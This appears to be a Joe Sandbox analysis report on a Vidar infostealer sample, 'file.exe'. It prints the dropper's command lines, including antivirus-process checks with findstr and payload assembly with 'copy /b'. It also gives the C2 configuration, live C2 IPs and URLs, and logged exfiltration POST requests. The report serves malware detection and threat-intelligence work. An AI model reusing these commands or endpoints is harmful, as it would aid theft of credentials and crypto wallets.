Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1501386
MD5:2f5226b4116ce79afb6dcb32fa647954
SHA1:15f395c9a4a894a660d318a6779094d311f0a1f7
SHA256:8febc589fc4de7b009d3e406fddba66e389d5544bc5fad44d03f712ebf6c2bfa
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1480 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2F5226B4116CE79AFB6DCB32FA647954)
    • cmd.exe (PID: 4028 cmdline: "C:\Windows\System32\cmd.exe" /k move Cashiers Cashiers.bat & Cashiers.bat & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6276 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3732 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 5596 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5556 cmdline: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 4612 cmdline: cmd /c md 271973 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 2460 cmdline: findstr /V "NorwegianLivedJerseyRelaxation" Para MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2220 cmdline: cmd /c copy /b ..\Ventures + ..\Thousands + ..\Enhance + ..\Kept + ..\Everything + ..\Say C MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Tenant.pif (PID: 2260 cmdline: Tenant.pif C MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • WerFault.exe (PID: 5256 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 3264 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • choice.exe (PID: 1084 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199761128941"], "Botnet": "283e465e3e8feb6cb806690b98c9bf31"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 7 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              11.2.Tenant.pif.150000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                11.2.Tenant.pif.150000.0.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                • 0x1ca20:$s1: JohnDoe
                • 0x1ca28:$s2: HAL9TH
                11.2.Tenant.pif.13e3318.3.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  11.2.Tenant.pif.13e3318.3.raw.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                  • 0x1ca20:$s1: JohnDoe
                  • 0x1ca28:$s2: HAL9TH
                  11.2.Tenant.pif.13e3318.3.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    Click to see the 1 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Execution of Suspicious File Type Extension
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Tenant.pif C, CommandLine: Tenant.pif C, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Cashiers Cashiers.bat & Cashiers.bat & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4028, ParentProcessName: cmd.exe, ProcessCommandLine: Tenant.pif C, ProcessId: 2260, ProcessName: Tenant.pif

                    Suricata Signatures

                    Timestamp:2024-08-29T20:49:45.709612+0200
                    SID:2028765
                    Severity:3
                    Source Port:59952
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:49:55.420274+0200
                    SID:2028765
                    Severity:3
                    Source Port:59957
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:49:22.722325+0200
                    SID:2028765
                    Severity:3
                    Source Port:59938
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:49:27.286287+0200
                    SID:2044247
                    Severity:1
                    Source Port:443
                    Destination Port:59941
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-29T20:50:03.661659+0200
                    SID:2054495
                    Severity:1
                    Source Port:59961
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-08-29T20:49:29.365044+0200
                    SID:2028765
                    Severity:3
                    Source Port:59943
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:49:52.374206+0200
                    SID:2028765
                    Severity:3
                    Source Port:59955
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:49:34.489806+0200
                    SID:2028765
                    Severity:3
                    Source Port:59945
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:49:51.411352+0200
                    SID:2028765
                    Severity:3
                    Source Port:59954
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:50:01.060380+0200
                    SID:2028765
                    Severity:3
                    Source Port:59960
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:49:27.945326+0200
                    SID:2028765
                    Severity:3
                    Source Port:59942
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:49:23.881214+0200
                    SID:2028765
                    Severity:3
                    Source Port:59939
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:49:26.574584+0200
                    SID:2028765
                    Severity:3
                    Source Port:59941
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:49:30.969182+0200
                    SID:2028765
                    Severity:3
                    Source Port:59944
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:49:37.787326+0200
                    SID:2028765
                    Severity:3
                    Source Port:59948
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:49:58.900576+0200
                    SID:2028765
                    Severity:3
                    Source Port:59959
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:49:42.053985+0200
                    SID:2028765
                    Severity:3
                    Source Port:59950
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:49:36.478659+0200
                    SID:2028765
                    Severity:3
                    Source Port:59947
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:49:56.817977+0200
                    SID:2028765
                    Severity:3
                    Source Port:59958
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:49:47.284094+0200
                    SID:2028765
                    Severity:3
                    Source Port:59953
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:49:25.234179+0200
                    SID:2028765
                    Severity:3
                    Source Port:59940
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:49:35.389430+0200
                    SID:2028765
                    Severity:3
                    Source Port:59946
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:49:28.638207+0200
                    SID:2049087
                    Severity:1
                    Source Port:59942
                    Destination Port:443
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-08-29T20:49:28.638383+0200
                    SID:2051831
                    Severity:1
                    Source Port:443
                    Destination Port:59942
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-29T20:49:39.983960+0200
                    SID:2028765
                    Severity:3
                    Source Port:59949
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:49:43.989360+0200
                    SID:2028765
                    Severity:3
                    Source Port:59951
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T20:49:53.730356+0200
                    SID:2028765
                    Severity:3
                    Source Port:59956
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: https://steamcommunity.com/profiles/76561199761128941Avira URL Cloud: Label: malware
                    Source: https://94.130.188.148/nss3.dllAvira URL Cloud: Label: malware
                    Source: https://t.me/iyigunlAvira URL Cloud: Label: malware
                    Source: https://94.130.188.148/vcruntime140.dllCzAvira URL Cloud: Label: malware
                    Source: https://94.130.188.148/sqlr.dllAvira URL Cloud: Label: malware
                    Source: https://94.130.188.148/Avira URL Cloud: Label: malware
                    Source: https://94.130.188.148/vcruntime140.dllAvira URL Cloud: Label: malware
                    Source: https://steamcommunity.com/profiles/76561199761128941/badgesAvira URL Cloud: Label: malware
                    Source: https://94.130.188.148/freebl3.dllAvira URL Cloud: Label: malware
                    Source: https://94.130.188.148/softokn3.dlleAvira URL Cloud: Label: malware
                    Source: https://94.130.188.148/mozglue.dllAvira URL Cloud: Label: malware
                    Source: https://94.130.188.148/softokn3.dllAvira URL Cloud: Label: malware
                    Source: https://94.130.188.148/nss3.dllKEBKJD-journalAvira URL Cloud: Label: malware
                    Source: https://94.130.188.148Avira URL Cloud: Label: malware
                    Source: https://steamcommunity.com/profiles/76561199761128941/inventory/Avira URL Cloud: Label: malware
                    Source: https://94.130.188.148/mozglue.dllqAvira URL Cloud: Label: malware
                    Source: https://94.130.188.148/sqlr.dll1Avira URL Cloud: Label: malware
                    Source: https://94.130.188.148/msvcp140.dllAvira URL Cloud: Label: malware
                    Source: https://94.130.188.148/msvcp140.dllIAvira URL Cloud: Label: malware
                    Found malware configuration
                    Source: 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199761128941"], "Botnet": "283e465e3e8feb6cb806690b98c9bf31"}
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 86.2% probability
                    Machine Learning detection for sample
                    Source: file.exeJoe Sandbox ML: detected
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:59937 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 94.130.188.148:443 -> 192.168.2.5:59938 version: TLS 1.2
                    Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: freebl3.pdb source: Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: mozglue.pdbP source: Tenant.pif, 0000000B.00000002.4097408823.000000006C69D000.00000002.00000001.01000000.00000009.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                    Source: Binary string: freebl3.pdbp source: Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: nss3.pdb@ source: Tenant.pif, 0000000B.00000002.4097716710.000000006C85F000.00000002.00000001.01000000.00000008.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr
                    Source: Binary string: softokn3.pdb@ source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Tenant.pif, 0000000B.00000002.4090409721.000000002B265000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Tenant.pif, 0000000B.00000002.4085470552.000000001F389000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.11.dr
                    Source: Binary string: nss3.pdb source: Tenant.pif, 0000000B.00000002.4097716710.000000006C85F000.00000002.00000001.01000000.00000008.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr
                    Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmp
                    Source: Binary string: mozglue.pdb source: Tenant.pif, 0000000B.00000002.4097408823.000000006C69D000.00000002.00000001.01000000.00000009.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                    Source: Binary string: softokn3.pdb source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B04005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00B04005
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B0C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00B0C2FF
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B0494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_00B0494A
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B0CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_00B0CD9F
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B0CD14 FindFirstFileW,FindClose,11_2_00B0CD14
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B0F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00B0F5D8
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B0F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00B0F735
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B0FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00B0FA36
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B03CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00B03CE2
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\271973\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\271973Jump to behavior

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.5:59961 -> 95.164.119.162:80
                    Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.5:59942 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 94.130.188.148:443 -> 192.168.2.5:59942
                    Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 94.130.188.148:443 -> 192.168.2.5:59941
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199761128941
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199761128941 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 95.164.119.162 95.164.119.162
                    Source: Joe Sandbox ViewIP Address: 23.197.127.21 23.197.127.21
                    Source: Joe Sandbox ViewIP Address: 94.130.188.148 94.130.188.148
                    Source: Joe Sandbox ViewASN Name: VAKPoltavaUkraineUA VAKPoltavaUkraineUA
                    Source: Joe Sandbox ViewASN Name: AKAMAI-ASN1EU AKAMAI-ASN1EU
                    Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                    Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59941 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59944 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59940 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59938 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59942 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59943 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59939 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59946 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59945 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59948 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59947 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59949 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59950 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59951 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59952 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59953 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59954 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59958 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59955 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59959 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59957 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59956 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59960 -> 94.130.188.148:443
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 94.130.188.148Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 94.130.188.148Content-Length: 254Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBKJDBAAKJDGCBFHCFCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 94.130.188.148Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFHJEGDAFHIJKECFBKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 94.130.188.148Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 94.130.188.148Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 94.130.188.148Content-Length: 6797Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /sqlr.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 94.130.188.148Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 94.130.188.148Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
